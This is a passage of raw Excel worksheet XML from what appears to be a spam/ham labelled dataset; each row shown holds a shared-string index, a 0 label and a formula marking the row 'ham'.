    <row r="3869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3869" t="s">
        <v>3253</v>
      </c>
      <c r="B3869">
        <v>0</v>
      </c>
      <c r="C3869" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3870" t="s">
        <v>3254</v>
      </c>
      <c r="B3870">
        <v>0</v>
      </c>
      <c r="C3870" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3871" t="s">
        <v>3255</v>
      </c>
      <c r="B3871">
        <v>0</v>
      </c>
      <c r="C3871" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3872" t="s">
        <v>3256</v>
      </c>
      <c r="B3872">
        <v>0</v>
      </c>
      <c r="C3872" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3873" t="s">
        <v>3257</v>
      </c>
      <c r="B3873">
        <v>0</v>
      </c>
      <c r="C3873" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3874" t="s">
        <v>3258</v>
      </c>
      <c r="B3874">
        <v>0</v>
      </c>
      <c r="C3874" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3875" t="s">
        <v>3259</v>
      </c>
      <c r="B3875">
        <v>0</v>
      </c>
      <c r="C3875" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3876" t="s">
        <v>3260</v>
      </c>
      <c r="B3876">
        <v>0</v>
      </c>
      <c r="C3876" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3877" t="s">
        <v>3261</v>
      </c>
      <c r="B3877">
        <v>0</v>
      </c>
      <c r="C3877" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3878" t="s">
        <v>3262</v>
      </c>
      <c r="B3878">
        <v>0</v>
      </c>
      <c r="C3878" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3879" t="s">
        <v>3263</v>
      </c>
      <c r="B3879">
        <v>0</v>
      </c>
      <c r="C3879" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3880" t="s">
        <v>3264</v>
      </c>
      <c r="B3880">
        <v>0</v>
      </c>
      <c r="C3880" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3881" t="s">
        <v>3265</v>
      </c>
      <c r="B3881">
        <v>0</v>
      </c>
      <c r="C3881" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3882" t="s">
        <v>3266</v>
      </c>
      <c r="B3882">
        <v>0</v>
      </c>
      <c r="C3882" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3883" t="s">
        <v>3267</v>
      </c>
      <c r="B3883">
        <v>0</v>
      </c>
      <c r="C3883" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3884" t="s">
        <v>3268</v>
      </c>
      <c r="B3884">
        <v>0</v>
      </c>
      <c r="C3884" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3885" t="s">
        <v>3269</v>
      </c>
      <c r="B3885">
        <v>0</v>
      </c>
      <c r="C3885" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3886" t="s">
        <v>3270</v>
      </c>
      <c r="B3886">
        <v>0</v>
      </c>
      <c r="C3886" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3887" t="s">
        <v>3271</v>
      </c>
      <c r="B3887">
        <v>0</v>
      </c>
      <c r="C3887" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3888" t="s">
        <v>3272</v>
      </c>
      <c r="B3888">
        <v>0</v>
      </c>
      <c r="C3888" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3889" t="s">
        <v>3273</v>
      </c>
      <c r="B3889">
        <v>0</v>
      </c>
      <c r="C3889" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3890" t="s">
        <v>3274</v>
      </c>
      <c r="B3890">
        <v>0</v>
      </c>
      <c r="C3890" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3891" t="s">
        <v>3275</v>
      </c>
      <c r="B3891">
        <v>0</v>
      </c>
      <c r="C3891" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3892" t="s">
        <v>3276</v>
      </c>
      <c r="B3892">
        <v>0</v>
      </c>
      <c r="C3892" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3893" t="s">
        <v>3277</v>
      </c>
      <c r="B3893">
        <v>0</v>
      </c>
      <c r="C3893" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3894" t="s">
        <v>3278</v>
      </c>
      <c r="B3894">
        <v>0</v>
      </c>
      <c r="C3894" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3895" t="s">
        <v>3279</v>
      </c>
      <c r="B3895">
        <v>0</v>
      </c>
      <c r="C3895" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3896" t="s">
        <v>3280</v>
      </c>
      <c r="B3896">
        <v>0</v>
      </c>
      <c r="C3896" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3897" t="s">
        <v>3281</v>
      </c>
      <c r="B3897">
        <v>0</v>
      </c>
      <c r="C3897" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3898" t="s">
        <v>3282</v>
      </c>
      <c r="B3898">
        <v>0</v>
      </c>
      <c r="C3898" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3899" t="s">
        <v>3283</v>
      </c>
      <c r="B3899">
        <v>0</v>
      </c>
      <c r="C3899" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3900" t="s">
        <v>3284</v>
      </c>
      <c r="B3900">
        <v>0</v>
      </c>
      <c r="C3900" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3901" t="s">
        <v>3285</v>
      </c>
      <c r="B3901">
        <v>0</v>
      </c>
      <c r="C3901" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3902" t="s">
        <v>3286</v>
      </c>
      <c r="B3902">
        <v>0</v>
      </c>
      <c r="C3902" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3903" t="s">
        <v>3287</v>
      </c>
      <c r="B3903">
        <v>0</v>
      </c>
      <c r="C3903" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3904" t="s">
        <v>3288</v>
      </c>
      <c r="B3904">
        <v>0</v>
      </c>
      <c r="C3904" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3905" t="s">
        <v>3289</v>
      </c>
      <c r="B3905">
        <v>0</v>
      </c>
      <c r="C3905" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3906" t="s">
        <v>3290</v>
      </c>
      <c r="B3906">
        <v>0</v>
      </c>
      <c r="C3906" t="str">
        <f t="shared" ref="C3906:C3969" si="61">IF(B3906="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3907" t="s">
        <v>3291</v>
      </c>
      <c r="B3907">
        <v>0</v>
      </c>
      <c r="C3907" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3908" t="s">
        <v>3292</v>
      </c>
      <c r="B3908">
        <v>0</v>
      </c>
      <c r="C3908" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3909" t="s">
        <v>3293</v>
      </c>
      <c r="B3909">
        <v>0</v>
      </c>
      <c r="C3909" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3910" t="s">
        <v>3294</v>
      </c>
      <c r="B3910">
        <v>0</v>
      </c>
      <c r="C3910" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3911" t="s">
        <v>3295</v>
      </c>
      <c r="B3911">
        <v>0</v>
      </c>
      <c r="C3911" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3912" t="s">
        <v>3296</v>
      </c>
      <c r="B3912">
        <v>0</v>
      </c>
      <c r="C3912" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3913" t="s">
        <v>3297</v>
      </c>
      <c r="B3913">
        <v>0</v>
      </c>
      <c r="C3913" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3914" t="s">
        <v>3298</v>
      </c>
      <c r="B3914">
        <v>0</v>
      </c>
      <c r="C3914" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3915" t="s">
        <v>3299</v>
      </c>
      <c r="B3915">
        <v>0</v>
      </c>
      <c r="C3915" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3916" t="s">
        <v>3300</v>
      </c>
      <c r="B3916">
        <v>0</v>
      </c>
      <c r="C3916" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3917" t="s">
        <v>3301</v>
      </c>
      <c r="B3917">
        <v>0</v>
      </c>
      <c r="C3917" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3918" t="s">
        <v>3302</v>
      </c>
      <c r="B3918">
        <v>0</v>
      </c>
      <c r="C3918" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3919" t="s">
        <v>3303</v>
      </c>
      <c r="B3919">
        <v>0</v>
      </c>
      <c r="C3919" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3920" t="s">
        <v>3304</v>
      </c>
      <c r="B3920">
        <v>0</v>
      </c>
      <c r="C3920" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3921" t="s">
        <v>3305</v>
      </c>
      <c r="B3921">
        <v>0</v>
      </c>
      <c r="C3921" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3922" t="s">
        <v>3306</v>
      </c>
      <c r="B3922">
        <v>0</v>
      </c>
      <c r="C3922" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3923" t="s">
        <v>3307</v>
      </c>
      <c r="B3923">
        <v>0</v>
      </c>
      <c r="C3923" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3924" t="s">
        <v>3308</v>
      </c>
      <c r="B3924">
        <v>0</v>
      </c>
      <c r="C3924" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3925" t="s">
        <v>3309</v>
      </c>
      <c r="B3925">
        <v>0</v>
      </c>
      <c r="C3925" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3926" t="s">
        <v>3310</v>
      </c>
      <c r="B3926">
        <v>0</v>
      </c>
      <c r="C3926" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3927" t="s">
        <v>3311</v>
      </c>
      <c r="B3927">
        <v>0</v>
      </c>
      <c r="C3927" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3928" t="s">
        <v>3312</v>
      </c>
      <c r="B3928">
        <v>0</v>
      </c>
      <c r="C3928" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3929" t="s">
        <v>3313</v>
      </c>
      <c r="B3929">
        <v>0</v>
      </c>
      <c r="C3929" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3930" t="s">
        <v>3314</v>
      </c>
      <c r="B3930">
        <v>0</v>
      </c>
      <c r="C3930" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3931" t="s">
        <v>3315</v>
      </c>
      <c r="B3931">
        <v>0</v>
      </c>
      <c r="C3931" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3932" t="s">
        <v>3316</v>
      </c>
      <c r="B3932">
        <v>0</v>
      </c>
      <c r="C3932" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3933" t="s">
        <v>3317</v>
      </c>
      <c r="B3933">
        <v>0</v>
      </c>
      <c r="C3933" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3934" t="s">
        <v>3318</v>
      </c>
      <c r="B3934">
        <v>0</v>
      </c>
      <c r="C3934" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3935" t="s">
        <v>3319</v>
      </c>
      <c r="B3935">
        <v>0</v>
      </c>
      <c r="C3935" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3936" t="s">
        <v>3320</v>
      </c>
      <c r="B3936">
        <v>0</v>
      </c>
      <c r="C3936" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3937" t="s">
        <v>3321</v>
      </c>
      <c r="B3937">
        <v>0</v>
      </c>
      <c r="C3937" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3938" t="s">
        <v>3322</v>
      </c>
      <c r="B3938">
        <v>0</v>
      </c>
      <c r="C3938" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3939" t="s">
        <v>3323</v>
      </c>
      <c r="B3939">
        <v>0</v>
      </c>
      <c r="C3939" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3940" t="s">
        <v>3324</v>
      </c>
      <c r="B3940">
        <v>0</v>
      </c>
      <c r="C3940" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3941" t="s">
        <v>3325</v>
      </c>
      <c r="B3941">
        <v>0</v>
      </c>
      <c r="C3941" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3942" t="s">
        <v>3326</v>
      </c>
      <c r="B3942">
        <v>0</v>
      </c>
      <c r="C3942" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3943" t="s">
        <v>3327</v>
      </c>
      <c r="B3943">
        <v>0</v>
      </c>
      <c r="C3943" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3944" t="s">
        <v>3328</v>
      </c>
      <c r="B3944">
        <v>0</v>
      </c>
      <c r="C3944" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3945" t="s">
        <v>3329</v>
      </c>
      <c r="B3945">
        <v>0</v>
      </c>
      <c r="C3945" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3946" t="s">
        <v>3315</v>
      </c>
      <c r="B3946">
        <v>0</v>
      </c>
      <c r="C3946" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3947" t="s">
        <v>3330</v>
      </c>
      <c r="B3947">
        <v>0</v>
      </c>
      <c r="C3947" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3948" t="s">
        <v>3316</v>
      </c>
      <c r="B3948">
        <v>0</v>
      </c>
      <c r="C3948" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3949" t="s">
        <v>3309</v>
      </c>
      <c r="B3949">
        <v>0</v>
      </c>
      <c r="C3949" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3950" t="s">
        <v>3331</v>
      </c>
      <c r="B3950">
        <v>0</v>
      </c>
      <c r="C3950" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3951" t="s">
        <v>3332</v>
      </c>
      <c r="B3951">
        <v>0</v>
      </c>
      <c r="C3951" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3952" t="s">
        <v>3314</v>
      </c>
      <c r="B3952">
        <v>0</v>
      </c>
      <c r="C3952" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3953" t="s">
        <v>3333</v>
      </c>
      <c r="B3953">
        <v>0</v>
      </c>
      <c r="C3953" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3954" t="s">
        <v>3334</v>
      </c>
      <c r="B3954">
        <v>0</v>
      </c>
      <c r="C3954" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3955" t="s">
        <v>3335</v>
      </c>
      <c r="B3955">
        <v>0</v>
      </c>
      <c r="C3955" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3956" t="s">
        <v>3336</v>
      </c>
      <c r="B3956">
        <v>0</v>
      </c>
      <c r="C3956" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3957" t="s">
        <v>3337</v>
      </c>
      <c r="B3957">
        <v>0</v>
      </c>
      <c r="C3957" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3958" t="s">
        <v>3338</v>
      </c>
      <c r="B3958">
        <v>0</v>
      </c>
      <c r="C3958" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3959" t="s">
        <v>3339</v>
      </c>
      <c r="B3959">
        <v>0</v>
      </c>
      <c r="C3959" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3960" t="s">
        <v>3340</v>
      </c>
      <c r="B3960">
        <v>0</v>
      </c>
      <c r="C3960" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3961" t="s">
        <v>3341</v>
      </c>
      <c r="B3961">
        <v>0</v>
      </c>
      <c r="C3961" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3962" t="s">
        <v>3342</v>
      </c>
      <c r="B3962">
        <v>0</v>
      </c>
      <c r="C3962" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3963" t="s">
        <v>3343</v>
      </c>
      <c r="B3963">
        <v>0</v>
      </c>
      <c r="C3963" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3964" t="s">
        <v>3344</v>
      </c>
      <c r="B3964">
        <v>0</v>
      </c>
      <c r="C3964" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3965" t="s">
        <v>3345</v>
      </c>
      <c r="B3965">
        <v>0</v>
      </c>
      <c r="C3965" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3966" t="s">
        <v>3332</v>
      </c>
      <c r="B3966">
        <v>0</v>
      </c>
      <c r="C3966" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3967" t="s">
        <v>3309</v>
      </c>
      <c r="B3967">
        <v>0</v>
      </c>
      <c r="C3967" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3968" t="s">
        <v>3346</v>
      </c>
      <c r="B3968">
        <v>0</v>
      </c>
      <c r="C3968" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3969" t="s">
        <v>3314</v>
      </c>
      <c r="B3969">
        <v>0</v>
      </c>
      <c r="C3969" t="str">
        <f t="shared" si="61"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3970" t="s">
        <v>3319</v>
      </c>
      <c r="B3970">
        <v>0</v>
      </c>
      <c r="C3970" t="str">
        <f t="shared" ref="C3970:C4033" si="62">IF(B3970="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3971" t="s">
        <v>3347</v>
      </c>
      <c r="B3971">
        <v>0</v>
      </c>
      <c r="C3971" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3972" t="s">
        <v>3348</v>
      </c>
      <c r="B3972">
        <v>0</v>
      </c>
      <c r="C3972" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3973" t="s">
        <v>3349</v>
      </c>
      <c r="B3973">
        <v>0</v>
      </c>
      <c r="C3973" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3974" t="s">
        <v>3331</v>
      </c>
      <c r="B3974">
        <v>0</v>
      </c>
      <c r="C3974" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3975" t="s">
        <v>3315</v>
      </c>
      <c r="B3975">
        <v>0</v>
      </c>
      <c r="C3975" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3976" t="s">
        <v>3350</v>
      </c>
      <c r="B3976">
        <v>0</v>
      </c>
      <c r="C3976" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3977" t="s">
        <v>3351</v>
      </c>
      <c r="B3977">
        <v>0</v>
      </c>
      <c r="C3977" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3978" t="s">
        <v>3326</v>
      </c>
      <c r="B3978">
        <v>0</v>
      </c>
      <c r="C3978" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3979" t="s">
        <v>3327</v>
      </c>
      <c r="B3979">
        <v>0</v>
      </c>
      <c r="C3979" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3980" t="s">
        <v>3316</v>
      </c>
      <c r="B3980">
        <v>0</v>
      </c>
      <c r="C3980" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3981" t="s">
